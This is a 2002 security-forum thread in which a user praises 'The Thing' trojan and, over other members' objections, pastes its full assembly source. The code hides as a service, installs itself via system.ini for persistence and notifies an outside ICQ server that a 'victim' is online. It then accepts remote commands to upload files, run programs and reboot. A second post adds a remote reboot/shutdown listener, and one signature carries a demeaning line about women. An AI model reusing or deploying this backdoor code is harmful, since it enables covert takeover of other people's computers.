-
November 9th, 2002, 01:42 PM
#1
Banned
"The Thing" like Trojans
"The thing", nice trojan (6 Kb) with icq notify, download and execute another application properties. Also can be embed in a html file with hex encoding (godmessage).
Are there any Assembly coded trojans out there? Also is there anyone use "the thing" in XP or 2K?
-
November 9th, 2002, 01:49 PM
#2
searching for trojan horses---------------------->go to hell
-
November 9th, 2002, 02:13 PM
#3
Banned
-
November 9th, 2002, 02:15 PM
#4
If I thought you were using this info for security purposes,I'd help,but the way you speak so highly of this trojan suggests to me that's not your intention.This is not a skiddy site,it's a security site.If you'd like to learn something by all means stick around,but if you want to deface web sites and put bugs in peoples computers I'd suggest getting in the shower and practicing keeping a good grip on the soap,because you'll probably need that knowledge soon.
[shadow] I don\'t believe in anarchy.If you\'re not smart enough to beat the system it\'s your problem. [/shadow]
-
November 9th, 2002, 03:15 PM
#5
Banned
i`m not a kiddy anyway. Give me the percentage of visitors that knows Assembly, C++ and Vbscript, %1, %5 max %10. also most of the visitors use those information to spy their girlfriends email account. So don`t **** my mind with "use this information for educational purposes only blah blah blah.." I`ve asked trojan for monitor that files activity. "Analyzing Examples" basic step of the Software engineering, remember?
; the tHing 1.6 server
.486P
Locals
jumps
.Model Flat ,StdCall
SOCKET_ERROR equ -1
WSAdata STRUCT
wVersion WORD ?
wHighVersion WORD ?
szDescription BYTE ?
szSystemStatus BYTE ?
iMaxSockets WORD ?
iMaxUdpDg WORD ?
lpVendorInfo DWORD ?
WSAdata ENDS
sockaddr_in STRUCT
sin_family WORD 0
sin_port WORD 0
sin_addr DWORD 0
sin_zero BYTE 8 dup (0)
sockaddr_in ENDS
INADDR_ANY equ 000000000h
AF_INET equ 2
max_size equ 1024
mb_ok equ 0 ;mb_ok gets the value "0"
hWnd equ 0
lpText equ offset text ;set a pointer to the text
lpCaption equ offset caption ;set a pointer to the caption
; declaration of all used API-functions
extrn WSAStartup : proc
extrn WSACleanup : proc
extrn WSAGetLastError : proc
extrn htons : proc
extrn bind : proc
extrn socket : proc
extrn listen : proc
extrn accept : proc
extrn connect : proc
extrn inet_addr : proc
extrn send : proc
extrn recv : proc
extrn closesocket : proc
extrn gethostname : proc
extrn gethostbyname : proc
extrn inet_ntoa : proc
extrn Sleep : proc
extrn ExitProcess : PROC ;procedure to shut down a process
extrn MessageBoxA : PROC ;procedure to show a MessageBox
extrn GetModuleHandleA : PROC
extrn GetProcAddress : PROC
extrn GetCurrentProcessId : PROC
extrn ExitWindowsEx : proc
extrn ShellExecuteA : proc
extrn GetWindowsDirectoryA : proc
extrn lstrcmp : proc
extrn lstrlen : proc
extrn lstrcat : proc
extrn lstrcpy : proc
extrn CreateFileA : proc
extrn OpenFile : proc
;extrn ReadFile : proc
extrn WriteFile : proc
extrn CloseHandle : proc
extrn GetCommandLineA : proc
extrn CopyFileA : proc
extrn GetLastError : proc
extrn GetUserNameA : proc
extrn MessageBeep : proc
extrn WritePrivateProfileStringA: proc
; here begins our Data
.Data
wsa WSADATA ?
sa dw AF_INET ; Family
sockport db 0,0 ; TCP Port
sockip db 0,0,0,0 ; IP Address
db 8 dup(0) ; zero stuff.
xsysini db 'explorer.exe ',0
xsys db 'system.ini',0
xboot db 'boot',0
xshell db 'shell',0
xsysadd db '\',0
newpath db 100 dup (0)
exename db 100 dup (0)
;// icq
icqp db '205.188.147.55',0
db 10 dup(0)
portis db '+,+Port+:+',0
passis db '+,+Password+:+',0
xport db '00000',0
to db '&to=',0
endicq db ' HTTP/1.0',0
eol db 13,10,13,10,13,10,0
sysname db 'netlog.exe',0
db 5 dup (0)
icq db '29839368',0
db 5 dup (0)
passw db 'fc',0
db 10 dup (0)
nick db 'slave',0
db 10 dup (0)
port dd 6000
conn_socket dd 0
data_socket dd 0
server sockaddr_in <0,0,0,0>
client sockaddr_in ?
text2 db 30 dup (0)
saddrlen dw 16
db 16 dup (0)
buff db 1030 dup (0)
starticq db 'GET /scripts/WWPMsg.dll?from=Blade&fromemail=',0
nexticq db '&subject=+tHe+tHing+1.6&body=Victim+is+ONLINE+',0
h1 dd 0
h2 dd 0
packets dd 0
packet dd 0
pas db 0
f dd 0
i dd 0
how dd 0
text db "Cannot initialize socket.",0 ; error
mesaj db "the tHing 1.6 server.",0
_spawn db "spawned.",0
_kill db "server killed.",0
_disc db "disconnected.",0
_upload db "uploaded.",0
_write db '.',0
invalid db 'invalid password.',0
_ok db 'password accepted.',0
sysini2 db 'explorer.exe ',0
myip db '127.0.0.1',0
caption db "Error",0 ;Captionstring, 0-terminated
Kernel32 db "Kernel32.dll",0
RSP db "RegisterServiceProcess",0
icqip db '205.188.147.55',0
db 10 dup(0)
.Code
Main:
push offset Kernel32
call GetModuleHandleA ; get the handle of kernel32.dll
push offset RSP
push eax
call GetProcAddress ; get the address of the function
mov ebx, eax ; save the pointer into ebx
call GetCurrentProcessId ; get the current process's id
push 1 ; 1 = Register as Service
push eax ; process id
call ebx ; call RegisterServiceProcess
call GetCommandLineA ; get parameters (exe name)
mov esi,eax
inc esi
mov edi,offset exename
conv:
mov al,byte ptr [esi]
cmp al,22h
jz terminat
mov byte ptr [edi],al
inc esi
inc edi
jmp conv
terminat:
; // moving part
call GetWindowsDirectoryA,offset newpath,100
call lstrcat,offset newpath,offset sysadd
call lstrcat,offset newpath,offset sysname
call CopyFileA,offset exename,offset newpath,0
call lstrcpy,offset buff,offset sysini
call lstrcat,offset buff,offset sysname
call WritePrivateProfileStringA,offset boot,offset shell,offset buff,offset sys
try_again:mov pas,0
call WSAStartup,202h,offset wsa
cmp eax,SOCKET_ERROR
jnz gata
error:
call closesocket,conn_socket
call closesocket,data_socket
call WSAcleanup
call Sleep,300
jmp try_again
gata:
; // icq notification
call socket, 2, 1, 0
cmp eax,-1
jz error
mov conn_socket,eax
mov cx,200
mov edi,offset buff
iary: dec cx
inc edi
mov byte ptr [edi],0
cmp cx,0
jnz iary
call htons,80
mov [server.sin_family],AF_INET
mov [server.sin_port],ax
call inet_addr,offset icqip
cmp eax,-1
jz error
mov [server.sin_addr],eax
call connect,conn_socket,offset server,16
cmp eax,-1
jz error
mov byte ptr buff,0
call lstrcpy,offset buff,offset starticq
call lstrcat,offset buff,offset xnick
call lstrcat,offset buff,offset nexticq
call lstrcat,offset buff,offset passis
call lstrcat,offset buff,offset passw
call lstrcat,offset buff,offset portis
call lstrcat,offset buff,offset xport
;// Call GetUserNameA,offset username,50
;// call lstrcat,offset buff,offset useris
call lstrcat,offset buff,offset to
call lstrcat,offset buff,offset icq
call lstrcat,offset buff,offset endicq
call lstrcat,offset buff,offset eol
call lstrlen,offset buff
call send,conn_socket,offset buff,eax,0
cmp eax,-1
jz error
call closesocket,conn_socket
; end of ICQ
start_listen:
; // start of server listen
call socket, 2, 1, 0
cmp eax,0
jb error
mov conn_socket,eax
call htons,6000
mov [server.sin_family],AF_INET
mov [server.sin_port],ax
mov [server.sin_addr],0
call bind, conn_socket, offset server, 16
cmp eax,-1
jz error
push 5
push conn_socket
call listen
cmp eax,-1
jz error
mov data_socket,0
again:
mov byte ptr buff,0
cmp data_socket,0
jnz after
call accept,conn_socket,offset client,offset saddrlen
cmp eax,-1
jz error
mov data_socket,eax
mov pas,0
call send,data_socket,offset mesaj,22,0
cmp eax,-1
jz error
mov cx,12
mov edi,offset buff
iarx: dec cx
inc edi
mov byte ptr [edi],0
cmp cx,0
jnz iarx
call recv,data_socket,offset buff,12,0
cmp eax,-1
jz error
call lstrcmp,offset buff,offset passw
cmp eax,0
jz ok
call send,data_socket,offset invalid,17,0
cmp eax,-1
jz error
mov data_socket,0
jmp again
ok: call send,data_socket,offset _ok,18,0
after: cmp pas,0
jnz upload_2
mov cx,200
mov edi,offset buff
iar: dec cx
inc edi
mov byte ptr [edi],0
cmp cx,0
jnz iar
call recv,data_socket,offset buff,200,0
cmp eax,-1
jz error
mov al,byte ptr buff
; QUIT (kill server)
cmp al,'Q'
jz quit
; Reboot the computer
cmp al,'R'
jz Reboot
; Spawn program
cmp al,'S'
jz Spawn
; Get Windows Directory
cmp al,'W'
jz WinDir
; Upload File (expect U;filename;fsize)
cmp al,'U'
jz Upload
; Disconnect
cmp al,'D'
jz disconnect
jmp again
Disconnect:
call send,data_socket,offset _disc,14,0
cmp eax,-1
jz error
call closesocket,data_socket
mov data_socket,0
jmp again
Upload_2:
mov eax,packet
cmp eax,packets
jl read
jmp close_file
read:
call recv,data_socket,offset buff,max_size,0
cmp eax,-1
jz error
mov how,eax
add packet,eax
call WriteFile,f,offset buff, how, offset i,0
cmp eax,-1
jz error
call send,data_socket,offset _write,1,0
cmp eax,-1
jz error
jmp again
close_file:
mov pas,0
mov packets,0
call send,data_socket,offset _upload,9,0
cmp eax,-1
jz error
call CloseHandle,f
jmp again
Upload:
mov edi,offset buff+2
mov esi,edi
here:
cmp byte ptr [edi],';'
jz _gata
inc edi
jmp here
_gata: mov byte ptr [edi],0
; at this moment edi+1 = offset to filezise
; esi = offset to filename terminated in zero
; must convert filesize to integer
push esi
xor ecx,ecx
inc edi
call lstrlen,edi
_again:
xor edx,edx
mov dl,byte ptr [edi]
sub dl,"0" ; subtrack each digit with "0" to convert it to hex value
mov esi,eax
dec esi
push eax
mov eax,edx
push ebx
mov ebx,10
_iar:cmp esi,0
jbe __gata
mul ebx
dec esi
jmp _iar
__gata:
pop ebx
add ecx,eax
pop eax
inc edi
dec eax
cmp eax,0
jnz _again
mov eax,ecx ; converted (ax contains fsize)
mov packet,0
mov packets,eax
mov pas,1
pop esi
call CreateFileA,esi,40000000h,1,0,2,20h,0
mov f,eax
jmp again
WinDir:
call GetWindowsDirectoryA,offset buff,100
mov edi,offset buff
mov al,0
mov ecx,0FFFFFFFFh
repne scasb
sub ecx,0FFFFFFFFh
neg ecx
dec ecx
mov eax,ecx
call send,data_socket,offset buff,eax,0
cmp eax,-1
jz error
jmp again
Spawn:
call ShellExecuteA,0,0,offset buff+2,0,0,0
mov byte ptr buff,0
cmp eax,32
jl again
call send,data_socket,offset _spawn,8,0
cmp eax,-1
jz error
jmp again
Reboot:
call ExitWindowsEx,6,offset port
quit: jmp next
sysini db 'explorer.exe ',0
sys db 'system.ini',0
boot db 'boot',0
shell db 'shell',0
sysadd db '\',0
xnick db 'neo',0
db 10 dup (0)
useris db ',+username+:+'
username db 50 dup (0)
next:
call WritePrivateProfileStringA,offset boot,offset shell,offset sysini2,offset sys
call send,data_socket,offset _kill,15,0
call closesocket,data_socket
call closesocket,conn_socket
call ExitProcess
End Main ;End of code, Main is the entrypoint
-
November 9th, 2002, 04:10 PM
#6
I'd actually say 10%+.There's a very high number of professionals(network,security,programming,and so on) on this site compared to most "security" sites.Even the people who aren't into computers as a profession are still intelligent and trying to learn without going the illegal route.So,I'll give you the "for educational purposes only blah blah blah."That's what this site's here for EDUCATION on how to stop people from putting crap like that on their computer.
I'm sure some people in here do use the info to spy on their girlfriends Email account,but most people in here try not to contribute to it if they can help it,but since there's no way to read someone's intentions without them telling you their intentions,all we can do is try.
[shadow] I don\'t believe in anarchy.If you\'re not smart enough to beat the system it\'s your problem. [/shadow]
-
November 9th, 2002, 04:34 PM
#7
Member
Grow up and dont waste our time trying to get trojan info so u can hack into others pc's.
I love pizza...........Do you?
-
November 9th, 2002, 06:15 PM
#8
the attachment is a cool tut about trojans (how they work and how to remove,how they auto start and..)i thought it might be useful for those who read this thread!
by the way Utreise neggin me won't get ya anywhere brah.
read the faq(trojans are considerd lammmmmmmmmme)
-----------------------------------------------------------------------------------------------------------------------
-
November 9th, 2002, 06:49 PM
#9
If you are a smart person, which i really doubt. I would not post anything that has to do with finding a way to harm other peoples computers. Like everybody has been telling you this is a security site not a skiddy. We all may disagree with what somebody says sometimes, but in the end we get together to learn and teach each other. If you are going to come in here thinking that we will use our knowledge to help you harm an innocent person, well my friend you have a lot of re-thinking to do.
-
November 9th, 2002, 07:59 PM
#10
***************
Give me the percentage of visitors that knows Assembly, C++ and Vbscript, %1, %5 max %10
***************
Utreise this isn't a flame, im following this thread to see if i can learn anything from it myself, but nobody knows you. you ask how many people here know anything, but just how much do you know. if you know anything at all, than you know 99% are full of ****. I don't 'think' you are, but i don't know that.
really, does posting code really say anything?
.386
.model flat,stdcall
option casemap:none
CreateSocket PROTO :DWORD
inv equ invoke
include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
include \masm32\include\user32.inc
include \masm32\include\shell32.inc
include \masm32\include\wsock32.inc
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\user32.lib
includelib \masm32\lib\shell32.lib
includelib \masm32\lib\wsock32.lib
.const
X_Win equ 160
Y_Win equ 090
port equ 25
WM_SOCKET equ WM_USER+100
ICON equ 1
RESTART equ 0
SHUTDOWN equ 1
SYSLOCKUP equ 2
.data
szShutdown db "Shutdown", 0
szRestart db "Restart", 0
szDunno db "I don't know this msg", 0
ClassName db "Win32ASM_Class", 0
AppName db "Server", 0
wc WNDCLASSEX <SIZEOF WNDCLASSEX, CS_HREDRAW or CS_VREDRAW, offset WndProc, \
NULL, NULL, NULL, NULL, NULL, COLOR_WINDOW + 1, NULL, \
offset ClassName, NULL>
szConnect db "Connection esthablished", 0
e**** db "Something went wrong!", 0
.data?
hInstance dd ?
hwnd dd ?
X_Pos dd ?
Y_Pos dd ?
msg MSG <?>
sin sockaddr_in <?>
sSocket dd ?
wsadata WSADATA <?>
bRead dd ?
available_data dd ?
cSocket dd ?
.code
start:
inv GetModuleHandle, NULL
mov hInstance, eax
mov wc.hInstance, eax
inv LoadIcon, hInstance, ICON
mov wc.hIcon, eax
mov wc.hIconSm, eax
inv LoadCursor, NULL, IDC_ARROW
mov wc.hCursor, eax
inv RegisterClassEx, offset wc
inv GetSystemMetrics,SM_CXSCREEN ; Calculate Screen center
shr eax, 1
sub eax, X_Win / 2
mov X_Pos, eax
inv GetSystemMetrics,SM_CYSCREEN
shr eax, 1
sub eax, Y_Win / 2
mov Y_Pos, eax
inv CreateWindowEx, NULL, offset ClassName, offset AppName, WS_OVERLAPPEDWINDOW, \
X_Pos, Y_Pos, X_Win, Y_Win, NULL, NULL, hInstance, NULL
mov hwnd, eax
inv ShowWindow, eax, SW_SHOW
inv UpdateWindow, hwnd
.while TRUE
inv GetMessage, offset msg, NULL, 0, 0
.break .if (!eax)
inv TranslateMessage, offset msg
inv DispatchMessage, offset msg
.endw
inv ExitProcess, msg.wParam
; Window Proc
WndProc proc hWnd:HWND, uMsg:UINT, wParam:WPARAM, lParam:LPARAM
.if uMsg == WM_DESTROY
inv closesocket, sSocket
inv WSACleanup
inv PostQuitMessage, NULL
.elseif uMsg == WM_CREATE
inv WSAStartup, 101h, offset wsadata
inv CreateSocket, hWnd
.elseif uMsg == WM_SOCKET
mov eax, wParam
mov cSocket, eax
mov eax, lParam
.if ax == FD_ACCEPT
inv accept, sSocket, 0, 0
.elseif ax == FD_READ
inv ioctlsocket, cSocket, FIONREAD, offset available_data
.if eax == NULL
inv GlobalAlloc, GMEM_FIXED + GMEM_ZEROINIT, available_data
mov bRead, eax
inv recv, cSocket, bRead, available_data, 0
mov available_data, eax
; inv MessageBox, hWnd, bRead, bRead, MB_OK
mov esi, bRead
cld
lodsb
.if al == RESTART
inv ExitWindowsEx, EWX_REBOOT, 0
.elseif al == SHUTDOWN
inv ExitWindowsEx, EWX_SHUTDOWN, 0
.else
inv MessageBox, hWnd, offset szDunno, offset AppName, MB_OK
.endif
inv GlobalFree, bRead
.else
inv MessageBox, hWnd, offset e****, offset e****, MB_OK
.endif
.endif
.else
inv DefWindowProc, hWnd, uMsg, wParam, lParam
ret
.endif
xor eax,eax
ret
WndProc endp
CreateSocket proc hWnd:DWORD
mov sin.sin_family, AF_INET
inv htons, port
mov sin.sin_port, ax
inv socket, PF_INET, SOCK_STREAM, 0
mov sSocket, eax
inv WSAAsyncSelect, sSocket, hWnd, WM_SOCKET, FD_ACCEPT + FD_CLOSE + FD_READ
inv bind, sSocket, offset sin, SIZEOF sin
inv listen, sSocket, 2
ret
CreateSocket endp
end start
Bukhari:V3B48N826 “The Prophet said, ‘Isn’t the witness of a woman equal to half of that of a man?’ The women said, ‘Yes.’ He said, ‘This is because of the deficiency of a woman’s mind.’”
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
-
Forum Rules
|
|